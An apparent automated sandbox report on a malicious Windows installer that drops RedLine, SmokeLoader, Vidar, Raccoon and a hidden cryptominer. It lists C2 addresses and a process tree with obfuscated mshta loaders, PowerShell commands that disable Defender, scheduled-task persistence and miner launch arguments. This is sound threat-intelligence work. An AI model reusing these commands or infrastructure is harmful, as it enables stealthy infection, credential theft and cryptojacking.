Analysis
-
max time kernel
502s -
max time network
626s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
26-10-2021 09:15
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
22dbd82a1a4fd75da57b26a24ba9cdfa
-
SHA1
6c31926d8b065469f71d7bd070fa4acd7182e414
-
SHA256
e3ccbd6d3d6194b84c0414d931b8d1c687ee17d9275bf155de3a29895f1c6a43
-
SHA512
1b50f871ae2bb7dc06f376ba314431b1b3f059cca3780062405d599b76f4a208f362f2011b887e40070506b944a618d51dbdceed3e59be6b6e75f0086c412b98
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
ChrisNEW
C2
194.104.136.5:46013
Extracted
Family
redline
Botnet
media25
C2
91.121.67.60:23325
Extracted
Family
smokeloader
Version
2020
C2
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
41.5
Botnet
933
C2
https://mas.to/@xeroxxx
Attributes
-
profile_id
933
Extracted
Family
raccoon
Botnet
187e8d46623768b376fedb48580157fafedb4942
Attributes
-
url4cnc
http://telegin.top/frombobu98s
http://ttmirror.top/frombobu98s
http://teletele.top/frombobu98s
http://telegalive.top/frombobu98s
http://toptelete.top/frombobu98s
http://telegraf.top/frombobu98s
https://t.me/frombobu98s
rc4.plain
rc4.plain
Signatures
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Adds policy Run key to start application 2 TTPs 2 IoCs
-
Blocklisted process makes network request 63 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 20 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 15 IoCs
-
autoit_exe 4 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 33 IoCs
-
Drops file in Windows directory 42 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
-
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Kills process with taskkill 10 IoCs
-
Modifies Internet Explorer settings 1 TTPs 5 IoCs
-
Modifies data under HKEY_USERS 19 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 20 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 47 IoCs
-
Suspicious use of SendNotifyMessage 43 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\isbsrgcC:\Users\Admin\AppData\Roaming\isbsrgc2⤵
-
C:\Users\Admin\AppData\Roaming\rebsrgcC:\Users\Admin\AppData\Roaming\rebsrgc2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0190442925.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0190442925.exeTue0190442925.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6607⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6767⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6847⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 6607⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 8847⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 9567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 10847⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0164db7e438.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0164db7e438.exeTue0164db7e438.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4LHA5.tmp\Tue0164db7e438.tmp"C:\Users\Admin\AppData\Local\Temp\is-4LHA5.tmp\Tue0164db7e438.tmp" /SL5="$5004E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0164db7e438.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0164db7e438.exe"C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue0164db7e438.exe" /SILENT8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01aa9c65fe676f9.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01aa9c65fe676f9.exeTue01aa9c65fe676f9.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01aa9c65fe676f9.exeC:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01aa9c65fe676f9.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01c895c354b.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c895c354b.exeTue01c895c354b.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c895c354b.exe"C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c895c354b.exe" -u7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue011ad96d4eb.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue011ad96d4eb.exeTue011ad96d4eb.exe6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01152ad4a43.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01152ad4a43.exeTue01152ad4a43.exe6⤵
- Executes dropped EXE
-
C:\ProgramData\1415129.exe"C:\ProgramData\1415129.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\5229116.exe"C:\ProgramData\5229116.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\919927.exe"C:\ProgramData\919927.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\6811453.exe"C:\ProgramData\6811453.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\4239408.exe"C:\ProgramData\4239408.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue01c0bbdb48.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue01c0bbdb48.exeTue01c0bbdb48.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2688 -s 15289⤵
- Executes dropped EXE
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"10⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffb6f4ddec0,0x7ffb6f4dded0,0x7ffb6f4ddee011⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff638289e70,0x7ff638289e80,0x7ff638289e9012⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=1796 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=2064 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2552 /prefetch:111⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2520 /prefetch:111⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1748 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=3032 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:211⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=2672 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=2672 /prefetch:811⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=1832 /prefetch:811⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1732,15325478683921143470,13471522206627134649,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_1301416401" --mojo-platform-channel-handle=844 /prefetch:811⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue015b6b3a9094.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8BFA80E5\Tue015b6b3a9094.exeTue015b6b3a9094.exe6⤵
- Executes dropped EXE
-
